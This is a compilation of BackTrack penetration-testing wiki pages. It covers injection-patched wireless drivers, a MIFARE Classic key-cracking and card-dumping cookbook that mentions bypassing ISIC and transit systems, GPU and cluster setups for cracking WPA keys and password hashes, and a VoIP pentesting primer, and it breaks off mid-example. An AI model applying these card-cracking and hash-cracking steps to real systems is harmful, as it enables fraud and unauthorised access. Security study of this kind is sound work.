BackTrack 5 R1 contains patched stock kernel 2.6.39.4 wireless drivers with several injection patches applied. Depending on card and setup, these drivers might not suit you.

rt2800usb

In some cases we've seen cards using the rt2800usb drivers (such as the AWUS036NH and AWUS036NEH ALFAs) act strange with the BT5R1 kernel. If this happens to you, you can try installing a recent compat-wireless and building it on your own. This specific version will work:

root@bt:~# ln -s /usr/src/linux /lib/modules/2.6.39.4/build
root@bt:~# cd /usr/src/
root@bt:~# wget http://linuxwireless.org/download/compat-wireless-2.6/compat-wireless-2011-07-14.tar.bz2
root@bt:~# tar jxpf compat-wireless-2011-07-14.tar.bz2
root@bt:~# wget http://www.backtrack-linux.org/2.6.39.patches.tar
root@bt:~# tar xpf 2.6.39.patches.tar
root@bt:~# cd compat-wireless-2011-07-14
root@bt:~# patch -p1 < ../patches/mac80211-2.6.29-fix-tx-ctl-no-ack-retry-count.patch
root@bt:~# patch -p1 < ../patches/mac80211.compat08082009.wl_frag+ack_v1.patch
root@bt:~# patch -p1 < ../patches/zd1211rw-2.6.28.patch
root@bt:~# patch -p1 < ../patches/ipw2200-inject.2.6.36.patch
root@bt:~# make
root@bt:~# make install
root@bt:~# reboot

BackTrack 5

BackTrack 5 contains patched stock kernel 2.6.38 wireless drivers, as well as several "external" drivers. Some of these drivers overlap, to provide maximum flexibility with various wireless attacks. The /etc/modprobe.d/blacklist dictates which preferred drivers are loaded at boot time. Generally speaking, all the older IEEE drivers are blacklisted and need to be loaded manually if you want to use them.

rtl8187 vs r8187

This is a confusing one. The rtl8187 is the mac80211 stack driver, while the r8187 is the old IEEE driver. Both support injection. The newer mac80211 rtl8187 drivers seem to have a nasty bug in VMware. For more information about these drivers check our rtl8187 vs r8187 page.

compat wireless

As Linux wireless drivers mature, more chipsets get added to the compatibility list. If none of the native BackTrack kernel drivers work for you, you might want to consider using a more recent version of compat-wireless.

Check out the compat-wireless page for information on how to get those drivers up and running.

Wireless Cards

THIS LIST NEEDS TO BE UPDATED FOR BT5.

Tested and working cards

We were able to test the following cards. Note that "passed" means "passed an aireplay -9" injection test. We will be expanding on this list as more feedback comes from the community. From our testing we found that most major chipsets were supported, as well as the most common cards.

AWUS036H (rtl8187, r8187) - both mac80211 and IEEE drivers - passed
AWUS036NH (Ralink RT2870/3070) - using the mac80211 rt2x00usb drivers - passed
BCM4312 802.11b/g LP-PHY (rev 01) - using the mac80211 b43, works well - passed
Rockland N3 (Ralink RT2870/3070) - using the mac80211 rt2x00usb drivers - passed
Edimax EW-7318USG USB (Ralink RT2501/RT2573) - using the mac80211 rt2500usb/rt73usb drivers - passed
ASUSTek Computer, Inc. RT2573 - using the mac80211 rt2500usb/rt73usb drivers - passed
Linksys WUSB54GC ver 3 - using the mac80211 rt2800usb drivers - passed
Ubiquiti SRC - using the mac80211 ath9k drivers - passed
Internal Intel Corporation PRO/Wireless 3945ABG - using the mac80211 iwl3945 drivers - passed
Dlink WNA-2330 PCMCIA - using the mac80211 ath5k drivers - passed
Atheros Communications Inc. AR9285 Wireless Network Adapter (PCI-Express) (rev 01) - using the mac80211 ath9k drivers - passed
Netgear wg111v2 - using the mac80211 rtl8187 drivers - passed
ZyXEL AG-225H v2 - using the mac80211 zd1211 drivers - passed
Intel 4956/5xxx - using the iwlagn drivers - passed

Working, without injection

Broadcom Corporation BCM4321 802.11a/b/g/n (rev 03)
Broadcom Corporation BCM4322 802.11a/b/g/n Wireless LAN Controller (rev 01)

Non-working cards

D-Link DWL-122 - using the mac80211 prism2_usb drivers - fail
Linksys WUSB600N v2 - using the mac80211 rt2800usb drivers - fail
AWUS051NH - fail

RFID Cooking with Mifare Classic

DISCLAIMER: The information and reference implementation is provided:

For informational use only as part of academic or research study, especially in the field of information security, cryptography and secure systems.

As-is, without any warranty, support or liability; any damages or consequences obtained as a result of consulting this information are purely on the side of the reader.

NOT to be used in illegal circumstances (for example to abuse, hack or trick a system which the reader does not have specific authorization for, such as ticketing systems, public transport, University/ISIC cards, building access systems or whatsoever systems using Mifare Classic as core technology).

NOTES:

This article contains no original research. All the research and implementation was made by other people and communities and is publicly available. We made this two cents just for fun and because we love BackTrack.

This is not an A-Z guide, so try harder!

0x00 - Preface

Some of you may have read that the proprietary symmetric key cryptographic algorithm of the MIFARE Classic card has been broken. The MIFARE Classic card is used in physical access control systems (PACS) and contactless payment systems (including tollway and public transportation systems). By some estimates, there are 500 million MIFARE cards deployed worldwide, and the majority of them are MIFARE Classic cards.

Mifare Classic is an inexpensive, entry-level chip based on the ISO/IEC 14443 Type A 13.56 MHz contactless smartcard standard, available with 1 kB or 4 kB of memory and using the proprietary CRYPTO1 cipher with 48-bit keys. There is no protection against cloning or modification. Anyone with a 50 € reader can use this weakness against your infrastructure. At least one sector is always encrypted with a default key. After cracking all keys, hackers are able to change the name, student university number, expiration date... This cookbook is a proof of concept of how easily that can be done.

Chosen ingredients: Backtrack | Touchatag starter package

Tested on: BackTrack 4 R2, BackTrack 5 Final (32bit)

Dependencies

root@bt:~# apt-get install flex libpcsclite-dev libusb-dev checkinstall

0x01 - Hardware

Touchatag - ACR122U

Touchatag is an ACS ACR122(U) NFC USB RFID reader. The USB reader works at 13.56 MHz (High Frequency RFID) and has a readout distance of about 4 cm (1 inch) when used with the Touchatag RFID tags. This product is made by Advanced Card Systems Limited and seems to be available in different layouts, but the hardware doesn't differ much: they are all using a PN532 NFC controller chip and an ST7 microcontroller unit.

0x02 - Software

ACR122U driver

root@bt:~# wget http://www.acs.com.hk/drivers/eng/ACR122U_driver_Lnx_Mac10.5_10.6_1.02_P.zip
root@bt:~# unzip -d acr122u ACR122U_driver_Lnx_Mac10.5_10.6_1.02_P.zip
root@bt:~# cd acr122u
root@bt:~# tar -jxvf acsccid-1.0.2.tar.bz2
root@bt:~# cd acsccid-1.0.2
root@bt:~# ./configure
root@bt:~# make
root@bt:~# checkinstall -D -y --install

Open Source Near Field Communication (NFC) Library /LIBNFC/

Libnfc is the first free NFC SDK and Programmers API released under the GNU Lesser

General Public License.

root@bt:~# apt-get install -y debhelper libtool && wget http://libnfc.googlecode.com/files/libnfc-1.4.2.tar.gz
root@bt:~# tar xfvz libnfc-1.4.2.tar.gz && cd libnfc-1.4.2
root@bt:~# svn checkout http://libnfc.googlecode.com/svn/tags/libnfc-1.4.2/debian
root@bt:~# dpkg-buildpackage -rfakeroot
root@bt:~# dpkg -i ../libnfc*.deb

Check your reader / target with nfc-list.

root@bt:~# nfc-list
nfc-list use libnfc 1.4.2 (r891)
Connected to NFC device: ACS ACR122U 00 00 / ACR122U103 - PN532 v1.6 (0x07)
1 ISO14443A passive target(s) was found:
    ATQA (SENS_RES): 00  02
    UID (NFCID1): xx  xx  xx  xx
    SAK (SEL_RES): 18

If your reader is rejected because of the firmware (log message: "Firmware (x.y) is bogus!"), just disable version checking. All you need to do is change ifdDriverOptions (line 55 in Info.plist) to skip version checking, like this:

root@bt:~# nano /usr/lib/pcsc/drivers/ifd-ccid.bundle/Contents/Info.plist
<key>ifdDriverOptions</key>
<string>0x0005</string>

Afterwards, restart the pcscd daemon and your Touchatag reader should be recognized and

ready.

MFOC - Mifare Classic Offline Cracker

Mifare Classic Offline Cracker is a tool that can recover keys from Mifare Classic cards. Thanks to Norbert Szetei and Pavol Luptak for their implementation of the attack. MFOC is a utility to compute (crack) all keys (A and B) for all sectors, provided at least one of the keys is already known. The keys file is the file where mfoc stores the cracked keys. Its format is compatible with nfc-mfclassic, so you can then use it to dump the card to a file, or write a dump onto the card.

root@bt:~# wget http://nfc-tools.googlecode.com/files/mfoc-0.10.2.tar.gz && tar -xvzf mfoc-0.10.2.tar.gz
root@bt:~# cd mfoc-0.10.2
root@bt:~# autoreconf -vis
root@bt:~# ./configure
root@bt:~# make
root@bt:~# checkinstall -D -y --install

0x03 - Dumping & Cooking

pcscd coordinates the loading of drivers for card readers. It allows applications to access smart cards and readers without knowing the details of the card or reader. It is a resource manager that coordinates communication with smart card readers, smart cards and cryptographic tokens connected to the system. I prefer to start pcscd in the foreground (no daemon) with pcscd -f. Then it's time to start mfoc. Use a high number of probes, because the default number of probes for recovering one sector's key is 20. The whole cracking process could take from 30 minutes to 30 hours.

You can also use the -k key parameter to add a key to the list of known keys, which is tried against your card in the initial phase. The -k option somehow didn't work for me, so I always compile my known keys directly into mfoc.c: search for "Array with default Mifare Classic keys". Not sure about other countries, but in the country where I live the keys are the same. Once you have keys from all sectors, you should be able to use RFID-Fu against other cards, which is an epic fail.

root@bt:~# nfc-mfclassic --help
Usage: nfc-mfclassic r|w a|b <dump.mfd> [<keys.mfd>]
  r|w           - Perform read from (r) or write to (w) card
  a|b           - Use A or B keys for action
  <dump.mfd>    - MiFare Dump (MFD) used to write (card to MFD) or (MFD to card)
  <keys.mfd>    - MiFare Dump (MFD) that contain the keys (optional)
Or: nfc-mfclassic x <dump.mfd> <payload.bin>
  x             - Extract payload (data blocks) from MFD
  <dump.mfd>    - MiFare Dump (MFD) that contains wanted payload
  <payload.bin> - Binary file where payload will be extracted

Keep in mind that the card UID will not be affected (changed) by this process. Buy a blank card or a Proxmark III if that is what you want. If you are now thinking about dumping your electronic wallet right after recharging it and writing the content back when the credit comes to zero, then please don't do it. What can stop you from doing that? Well, probably only your conscience, but if the card gets blocked within 24 hours of first use then don't complain. Yes, there are online checking and billing systems out there for basic cards.
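As an added example (not part of the original cookbook), the following Python audits a MIFARE Classic 1K dump in the .mfd layout that mfoc and nfc-mfclassic share: it reads every sector trailer, verifies the redundant access-bit encoding before anyone writes the dump back, and lists the sectors still protected by a well-known default key, the condition the preface describes. The dump bytes are constructed inline, and the default-key list is assumed to be a subset of mfoc's "Array with default Mifare Classic keys".

```python
"""Audit a MIFARE Classic 1K dump (.mfd: 16 sectors x 4 blocks x 16 bytes).

Added example, not from the original cookbook. The dump bytes are constructed
below; in practice you would read the file that nfc-mfclassic wrote.
"""
from dataclasses import dataclass
from typing import List

BLOCK_SIZE = 16
BLOCKS_PER_SECTOR = 4                      # MIFARE Classic 1K sector
SECTORS_1K = 16
DUMP_SIZE_1K = SECTORS_1K * BLOCKS_PER_SECTOR * BLOCK_SIZE   # 1024 bytes

# Well-known default keys (hex). Assumption: a subset of the public list that
# mfoc carries in its "Array with default Mifare Classic keys".
DEFAULT_KEYS = {
    "ffffffffffff",   # factory / transport key
    "000000000000",
    "a0a1a2a3a4a5",   # MAD key
    "d3f7d3f7d3f7",   # NDEF key
    "b0b1b2b3b4b5",
    "aabbccddeeff",
}


@dataclass
class SectorReport:
    sector: int
    key_a: str
    key_b: str
    key_a_default: bool
    key_b_default: bool
    access_bits_valid: bool


def access_bits_valid(trailer: bytes) -> bool:
    """Verify the redundant access-condition bytes 6..8 of a sector trailer.

    Every access bit Cx is stored once plain and once inverted (NXP MF1S50):
    byte6 = ~C2 | ~C1 (high | low nibble), byte7 = C1 | ~C3, byte8 = C3 | C2.
    A trailer that fails this check would brick the sector if written back.
    """
    b6, b7, b8 = trailer[6], trailer[7], trailer[8]
    c1, c2, c3 = b7 >> 4, b8 & 0x0F, b8 >> 4
    return ((b6 & 0x0F) == (~c1 & 0x0F)
            and (b6 >> 4) == (~c2 & 0x0F)
            and (b7 & 0x0F) == (~c3 & 0x0F))


def audit_dump(dump: bytes) -> List[SectorReport]:
    """Walk every sector trailer of a 1K dump and report its keys."""
    if len(dump) != DUMP_SIZE_1K:
        raise ValueError(f"expected {DUMP_SIZE_1K} bytes, got {len(dump)}")
    reports = []
    for sector in range(SECTORS_1K):
        # the sector trailer is the last block of each sector:
        # key A (6) | access bits (3) | user byte (1) | key B (6)
        trailer_block = sector * BLOCKS_PER_SECTOR + BLOCKS_PER_SECTOR - 1
        trailer = dump[trailer_block * BLOCK_SIZE:(trailer_block + 1) * BLOCK_SIZE]
        key_a, key_b = trailer[0:6].hex(), trailer[10:16].hex()
        reports.append(SectorReport(sector, key_a, key_b,
                                    key_a in DEFAULT_KEYS, key_b in DEFAULT_KEYS,
                                    access_bits_valid(trailer)))
    return reports


def default_key_sectors(reports: List[SectorReport]) -> List[int]:
    """Sectors still open to a default key: the foothold mfoc starts from."""
    return [r.sector for r in reports if r.key_a_default or r.key_b_default]


def build_sample_dump() -> bytes:
    """Constructed dump: the issuer changed keys on sectors 1..15 but left
    sector 0 on the factory key, and sector 5 carries corrupted access bits."""
    blocks = []
    for sector in range(SECTORS_1K):
        for _ in range(BLOCKS_PER_SECTOR - 1):
            blocks.append(bytes(BLOCK_SIZE))        # data blocks (zeros)
        if sector == 0:
            key_a = key_b = bytes.fromhex("ffffffffffff")
        else:
            key_a, key_b = bytes.fromhex("112233445566"), bytes.fromhex("665544332211")
        access = bytes.fromhex("ff078069")          # transport configuration
        if sector == 5:
            access = bytes.fromhex("fe078069")      # inverted nibble no longer matches
        blocks.append(key_a + access + key_b)
    return b"".join(blocks)


if __name__ == "__main__":
    for r in audit_dump(build_sample_dump()):
        flag = "DEFAULT KEY" if r.key_a_default or r.key_b_default else "ok"
        bits = "" if r.access_bits_valid else "  ACCESS BITS INCONSISTENT"
        print(f"sector {r.sector:2d}: A={r.key_a} B={r.key_b} {flag}{bits}")
```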

0x04 – ISIC Issue

With an ISIC (International Student Identity Card) an attacker can abuse around ten services, not only one. ISIC cards are widely used for entrance, transportation, dining payments and various other services or discounts. According to the homepage there are 4.5 million cardholders in 120 countries. The cards should be replaced with more secure types ASAP. It is possible to do much more than that, but as a sufficient demonstration let's play a little...

At some universities, there is only one entry security check – ISIC. As you can see this is

trivial to bypass. We did many tests with public transportation systems and with university

systems. Results are all the same – those systems are easily hackable.

0x06 – Conclusion

Finally, when will people learn their lesson? Cryptographic algorithms should be public so

that they can be scrutinized and tested. Secret algorithms aren’t more valuable because

they are secret. Anyone needing a highly secure smart card should make sure there's

layered security and not just depend on the chip's encryption.

0x07 – What's next?

Since I have access to a Proxmark III, which is a universal RFID hacking tool that can be used for 100% accurate cloning (even of the UID), I may one day write a second edition about c00king with Mifare Classic and HID Prox...

Arming BackTrack with GSM attack suite?

0x08 – Thanks

This cookbook was made with great help from h4f guys, many thanks to Vulcano and Back.

0x09 – References & Links

For further reading about this topic please see the following:

http://www.cs.virginia.edu/~kn5f/pdf/K.Nohl.PhD.Implementable.Privacy.for.RFID.Systems.pdf

http://events.ccc.de/congress/2007/Fahrplan/events/2378.en.html

http://packetstorm.rlz.cl/papers/wireless/2008-esorics.pdf

http://www.nethemba.com/mifare-classic-slides.pdf

http://code.google.com/p/nfc-tools/wiki/mfoc

0x0A - About

MI1 is a "full time security enthusiast" with a university degree in the field of informatics, recently focusing his passion on USRP and RFID.

This guide is a work in progress, and is meant to help those needing to get CUDA working

on their BackTrack machines.

Start by preparing your kernel sources for the Nvidia driver installation:

root@bt:~# prepare-kernel-sources
root@bt:~# cd /usr/src/linux
root@bt:~# cp -rf include/generated/* include/linux/

Download Nvidia drivers according to your CPU architecture:

32 bit: http://developer.download.nvidia.com/compute/cuda/4_0_rc2/drivers/devdriver_4.0_linux_32_270.40.run

64 bit: http://developer.download.nvidia.com/compute/cuda/4_0_rc2/drivers/devdriver_4.0_linux_64_270.40.run

Make sure you are not in an X session (log out to console), and run the Nvidia driver

installer.

Next, download the CUDA toolkit, according to your CPU architecture:

32 bit: http://www.nvidia.com/object/thankyou.html?url=/compute/cuda/4_0_rc2/toolkit/cudatoolkit_4.0.13_linux_32_ubuntu10.10.run

64 bit: http://www.nvidia.com/object/thankyou.html?url=/compute/cuda/4_0_rc2/toolkit/cudatoolkit_4.0.13_linux_64_ubuntu10.10.run

Ideally you should install the CUDA toolkit to /opt; this guide assumes that installation path.

Configure your environment variables so that the nvcc command works. You can do this by

appending the following lines in your /root/.bashrc file:

PATH=$PATH:/opt/cuda/bin
LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/opt/cuda/lib
export PATH
export LD_LIBRARY_PATH

Then run:

root@bt:~# source /root/.bashrc
root@bt:~# ldconfig

The whole purpose of this was to get the nvcc compiler installed. You can check that everything is set up correctly:

root@bt:~# which nvcc
/opt/cuda/bin/nvcc
root@bt:~# nvcc -V
nvcc: NVIDIA (R) Cuda compiler driver
Copyright (c) 2005-2011 NVIDIA Corporation
Built on Sun_Mar_20_16:45:27_PDT_2011
Cuda compilation tools, release 4.0, V0.2.1221
root@bt:~#

Now that the Nvidia driver and CUDA toolkit are installed, we can test their functionality with

a GPU powered tool such as pyrit.

root@bt:~# svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit
root@bt:~# cd pyrit/pyrit && python setup.py build && python setup.py install
root@bt:~# cd ../../
root@bt:~# cd pyrit/cpyrit_cuda && python setup.py build && python setup.py install

Run a benchmark to see that everything works as expected:

root@bt:~# pyrit benchmark
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Running benchmark (63787.8 PMKs/s)... \

Computed 63787.82 PMKs/s total.
#1: 'CUDA-Device #1 'GeForce GTX 295: 11558.7 PMKs/s (RTT 3.0)
#2: 'CUDA-Device #2 'GeForce GTX 295: 10912.5 PMKs/s (RTT 2.9)
#3: 'CUDA-Device #3 'GeForce GTX 295: 10632.1 PMKs/s (RTT 3.0)
#4: 'CUDA-Device #4 'GeForce GTX 295: 11654.7 PMKs/s (RTT 2.9)
#5: 'CUDA-Device #5 'GeForce GTX 295: 10868.9 PMKs/s (RTT 2.9)
#6: 'CUDA-Device #6 'GeForce GTX 295: 10322.8 PMKs/s (RTT 3.0)
#7: 'CPU-Core (SSE2)': 500.7 PMKs/s (RTT 2.7)
#8: 'CPU-Core (SSE2)': 508.9 PMKs/s (RTT 2.8)

Success! We can now use CUDA powered tools from within BackTrack.

Building a John the Ripper Cluster in Backtrack5 R2

In this tutorial we are going to build a cluster that will aid us in cracking hashes using

John the Ripper.

The first thing we want to do is install libssl-dev and mpich2 after which we configure it.

(Note: secretword must be the same on each machine.)

root@bt:~# apt-get install mpich2 libssl-dev
root@bt:~# touch /etc/mpd.conf
root@bt:~# chmod 600 /etc/mpd.conf
root@bt:~# echo "secretword=bt" >> /etc/mpd.conf
root@bt:~# touch mpd.hosts
root@bt:~# echo "192.168.1.69:1" >> mpd.hosts
root@bt:~# chmod 600 mpd.hosts
root@bt:~# mpdboot
root@bt:~# mpdtrace
bt
root@bt:~# mpdallexit

Now we install the MPI version of John the Ripper.

root@bt:~/Desktop# wget http://www.bindshell.net/tools/johntheripper/john-1.7.3.1-all-2-mpi8.tar.gz
root@bt:~/Desktop# tar xvfz john-1.7.3.1-all-2-mpi8.tar.gz
root@bt:~/Desktop/john-1.7.3.1-all-2-mpi8/src# make clean linux-x86-sse2
root@bt:~# mv -f john-1.7.3.1-all-2-mpi8 /pentest/passwords/john-mpi

After installing the MPI version of John the Ripper we configure our /etc/hosts file.

root@bt:~# nano /etc/hosts
127.0.0.1 localhost
192.168.1.69 server
192.168.1.70 node1

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts

NOTE: Do the exact same thing on the client.

Once we have the server and the client setup it's time to enable our SSH server and

transfer the configuration files from the server to the client.

root@bt:~# ssh [email protected] mkdir -p /root/.ssh
root@bt:~# cat /root/.ssh/id_rsa.pub | ssh [email protected] 'cat>>.ssh/authorized_keys'
root@bt:~# scp /root/mpd.hosts [email protected]:/root/
root@bt:~# scp /etc/mpd.conf [email protected]:/etc/
root@bt:~# scp /etc/hosts [email protected]:/etc/

If we start the cluster we should see our server and client.

root@bt:~# mpdboot -v --file=/root/mpd.hosts -n 2
running mpdallexit on bt
LAUNCHED mpd on bt via
RUNNING: mpd on bt
LAUNCHED mpd on 192.168.1.70 via bt2
RUNNING: mpd on 192.168.1.70

root@bt:~# mpdtrace
bt
bt2

Now let's test our cluster.

root@bt:~# echo "admin:21232f297a57a5a743894a0e4a801fc3" > /root/test
root@bt:~# scp /root/test [email protected]:/root/
root@bt:~# mpiexec -host 192.168.1.69 -np 2 /pentest/passwords/john-mpi/run/john --format:raw-MD5 /root/test
Loaded 1 password hash (Raw MD5 [raw-md5])
admin (admin)
admin (admin)
thread: 1 guesses: 1 time: 0:00:00:00 100% (1) c/s: 160 trying: admin - admins
thread: 0 guesses: 1 time: 0:00:00:00 100% (1) c/s: 133 trying: admin - admins

Building a Pyrit Cluster Backtrack5 R2

In this tutorial we are going to build a cluster on Backtrack5 R2 using Pyrit.

Pyrit comes installed by default on Backtrack5 R2. If you have removed it, simply

use apt-get install to install it.

The first step to creating a pyrit cluster is to create a configuration file.

root@bt:~# mkdir ~/.pyrit
root@bt:~# nano ~/.pyrit/config
root@bt:~# cat ~/.pyrit/config
default_storage = file://
limit_ncpus = 0
rpc_announce = true
rpc_announce_broadcast = false
rpc_knownclients = 192.168.1.69      (this is the server's IP)
rpc_server = true
workunit_size = 75000

After having the above configuration file on all our machines, we start the server.

root@bt:~# pyrit serve

Now from the client you should be able to see both cores.

NOTE: The pyrit list_cores command has a bug that when used will crash the server.

We can test our newly built cluster using pyrit's benchmark option.

root@bt:~# pyrit benchmark

If we switch to the server while running the benchmark, we can see that currently one

client is connected.

Penetration Testing VOIP with BackTrack

VoIP is an exciting technology which provides many benefits and cost effective solutions for communication. More and more small and enterprise businesses are replacing their old traditional telephony systems with IP based ones. A VoIP based PBX can provide many features such as: multiple extensions, caller ID, voice mail, IVR capabilities, recording of conversations, logging, and usage with hardware based telephones or software based ones (aka soft phones). Nowadays there are many vendors of PBXs, IP telephones, VoIP services and equipment, such as CISCO, AVAYA, ASTERISK, SNOM, THOMSON… With new technology comes a new challenge for both the defensive and offensive side of security.

One of the "great" dangers of traditional phone lines was that they were susceptible to eavesdropping. The "old school" way to eavesdrop on somebody's phone line was to physically connect a small transmitter inside or outside their premises, somewhere along the phone cord.

IP telephony systems are also susceptible to eavesdropping, but doing so in an IP environment is a little bit more difficult to execute and detect, and requires more knowledge and the right set of tools. In this article we won't discuss a particular vendor or technique; instead we will take a look at the concepts and the tools available for attacking VoIP in Backtrack Linux. The main goal of this article is to present the tools and their purpose in order to help you choose the right tool for the right situation. We will examine some real world attack vectors and discover how BackTrack can assist us in pentesting VoIP; we will also examine some of the tools present in BackTrack and their usage.

Typical VoIP Topologies

There are several ways IP based telephony can be implemented, here are some common

topologies and usage:

Self Hosted

A PBX (e.g. Asterisk) is installed at the client site and connected to an ISP or telephony service provider's PSTN via a SIP trunk/PRI; the VoIP traffic flows through a dedicated VLAN.

Visio diagram by Amir Avraham

Hosted Services

There is no need for a PBX on site: just a switch, a router, IP phones and a connection to the service provider's PBX via the internet or an IP/VPN connection. Each phone is configured with SIP account information.

Online SIP Service

Services like sipme.me provide an application for PCs or smartphones and a free SIP account, offering low prices for international calls and free calls between the service's users by assigning a phone number to each subscriber.

SIP Basics

The role of SIP (Session Initiation Protocol) is to set up, terminate or modify a voice or video call, where the voice and/or video traffic is carried by a protocol like RTP (Real-time Transport Protocol). SIP is an application layer protocol which uses UDP for transport (TCP and SCTP can be used as well).

SIP usually uses port 5060 (TCP or UDP) for unencrypted signaling, or 5061 for encrypted transport using TLS.

SIP is an ASCII based protocol which has some elements similar to the HTTP protocol, using a Request/Response model. Much like an HTTP request from a browser, a SIP client request is made using a SIP URI, a user agent and a method/request. SIP uses an e-mail like address format: user/phone@domain/ip. A typical SIP URI looks like:

sip:[email protected], sip:[email protected] , sip:[email protected]:5060

According to the request made by the client a response will be received with a status or error code, the following tables describe the available requests and responses in the SIP protocol.

SIP Requests / Methods

Request     Description
INVITE      Used to invite an account to participate in a call session.
ACK         Acknowledge an INVITE request.
CANCEL      Cancel a pending request.
REGISTER    Register user with a SIP server.
OPTIONS     Lists information about the capabilities of a caller.
BYE         Terminates a session between two users in a call.
REFER       Indicates that the recipient (identified by the Request URI) should contact a third party using the contact information provided in the request.
SUBSCRIBE   The SUBSCRIBE method is used to request current state and state updates from a remote node.
NOTIFY      The NOTIFY method is used to notify a SIP node that an event which has been requested by an earlier SUBSCRIBE method has occurred.

An Example SIP “INVITE” Request:

INVITE sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 192.168.1.102;rport;branch=z9hG4bKvbxaoqar
Max-Forwards: 70
To: 
From: "NightRanger" ;tag=eihgg
Call-ID: hfxsabthoymshub@backtrack
CSeq: 649 INVITE
Contact: 
Content-Type: application/sdp
Allow: INVITE,ACK,BYE,CANCEL,OPTIONS,PRACK,REFER,NOTIFY,SUBSCRIBE,INFO,MESSAGE
Supported: replaces,norefersub,100rel
User-Agent: Twinkle/1.2
Content-Length: 310

SIP Responses

Response  Description
1xx       Informational responses. Request received and being processed.
2xx       Successful responses. The action was successfully received, understood, and accepted.
3xx       Redirection responses.
4xx       Request failure responses. The request contains bad syntax or cannot be fulfilled at the server.
5xx       Server failure responses. The server failed to fulfill an apparently valid request.
6xx       Global failure responses. The request cannot be fulfilled at any server.

An Example SIP “Trying” Response:

SIP/2.0 100 Trying
Via: SIP/2.0/UDP 192.168.1.102;branch=z9hG4bKpmphujka;received=192.168.1.102;rport=5060
From: "NIghtRanger" ;tag=eihgg
To: 
Call-ID: hfxsabthoymshub@backtrack
CSeq: 650 INVITE
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Contact: 
Content-Length: 0

SIP Call Between 2 Phones Example

The calling phone sends an invite.

The called phone sends back a response of 100 (Trying).

The called phone then starts to ring and sends a response of 180 (Ringing).

When the caller picks up the phone the called phone sends a response of 200 (OK).

The calling phone sends an ACK response.

Conversation begins via RTP.

When the caller hangs up the phone a BYE request is sent.

The calling phone responds with 200 (OK).
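The following Python is an added example (not the article's own code) that applies the SIP basics above: it parses request and response messages, classifies responses by the 1xx to 6xx classes in the table, and checks a captured call against the INVITE/100/180/200/ACK/BYE/200 flow just described, including the Call-ID and CSeq matching that ties each response to its request. All messages are constructed inline with placeholder addresses (lab.example, 192.0.2.x).

```python
"""Parse SIP messages and validate a basic two-phone call flow.

Added example, not from the original article. Sample messages are constructed
inline with placeholder addresses; the expected sequence is the one described
in the "SIP Call Between 2 Phones" walkthrough.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

RESPONSE_CLASSES = {1: "Informational", 2: "Success", 3: "Redirection",
                    4: "Request failure", 5: "Server failure", 6: "Global failure"}

# (transaction method, status) per message of the expected flow; None = request
EXPECTED_FLOW: List[Tuple[str, Optional[int]]] = [
    ("INVITE", None), ("INVITE", 100), ("INVITE", 180), ("INVITE", 200),
    ("ACK", None), ("BYE", None), ("BYE", 200),
]


@dataclass
class SipMessage:
    is_request: bool
    method: str                 # request method, or CSeq method of a response
    status: Optional[int]       # status code for responses, None for requests
    headers: Dict[str, str] = field(default_factory=dict)

    @property
    def response_class(self) -> Optional[str]:
        if self.status is None:
            return None
        return RESPONSE_CLASSES.get(self.status // 100, "Unknown")


def parse_sip(raw: str) -> SipMessage:
    """Parse the start line and headers of one SIP message (body ignored)."""
    head, _, _body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            raise ValueError(f"malformed header line: {line!r}")
        headers[name.strip().lower()] = value.strip()
    for required in ("via", "call-id", "cseq"):
        if required not in headers:
            raise ValueError(f"missing mandatory header {required}")
    cseq = headers["cseq"].split()
    if len(cseq) != 2 or not cseq[0].isdigit():
        raise ValueError(f"malformed CSeq: {headers['cseq']!r}")
    cseq_method = cseq[1].upper()
    m = re.match(r"SIP/2\.0 (\d{3}) ", lines[0])
    if m:                                   # response: "SIP/2.0 <code> <reason>"
        return SipMessage(False, cseq_method, int(m.group(1)), headers)
    m = re.match(r"([A-Z]+) (\S+) SIP/2\.0$", lines[0])
    if not m:                               # request: "<METHOD> <URI> SIP/2.0"
        raise ValueError(f"unrecognised start line: {lines[0]!r}")
    if m.group(1) != cseq_method:
        raise ValueError("CSeq method does not match the request method")
    return SipMessage(True, m.group(1), None, headers)


def check_call_flow(msgs: List[SipMessage]) -> List[str]:
    """Return the deviations of a message list from the expected call flow."""
    issues = []
    if len({m.headers["call-id"] for m in msgs}) != 1:
        issues.append("messages do not share a single Call-ID")
    observed = [(m.method, m.status) for m in msgs]
    if observed != EXPECTED_FLOW:
        issues.append(f"sequence differs from the expected flow: {observed}")
    seen: Dict[str, SipMessage] = {}
    for m in msgs:
        cseq = m.headers["cseq"].upper()
        if m.is_request:
            seen[cseq] = m
        elif cseq not in seen:              # a response must echo its request's CSeq
            issues.append(f"response {m.status} matches no request (CSeq {cseq})")
    invite = next((m for m in msgs if m.is_request and m.method == "INVITE"), None)
    ack = next((m for m in msgs if m.method == "ACK"), None)
    if invite and ack and invite.headers["cseq"].split()[0] != ack.headers["cseq"].split()[0]:
        issues.append("ACK CSeq number differs from the INVITE it acknowledges")
    return issues


def _sample(start_line: str, cseq: str, call_id: str = "c0ns7ructed@lab.example") -> SipMessage:
    """Constructed message with placeholder addresses."""
    return parse_sip(
        f"{start_line}\r\n"
        "Via: SIP/2.0/UDP 192.0.2.10;rport;branch=z9hG4bKexample\r\n"
        "From: <sip:caller@lab.example>;tag=abcd\r\n"
        "To: <sip:callee@lab.example>\r\n"
        f"Call-ID: {call_id}\r\nCSeq: {cseq}\r\nContent-Length: 0\r\n\r\n")


SAMPLE_CALL = [
    _sample("INVITE sip:callee@lab.example SIP/2.0", "1 INVITE"),
    _sample("SIP/2.0 100 Trying", "1 INVITE"),
    _sample("SIP/2.0 180 Ringing", "1 INVITE"),
    _sample("SIP/2.0 200 OK", "1 INVITE"),
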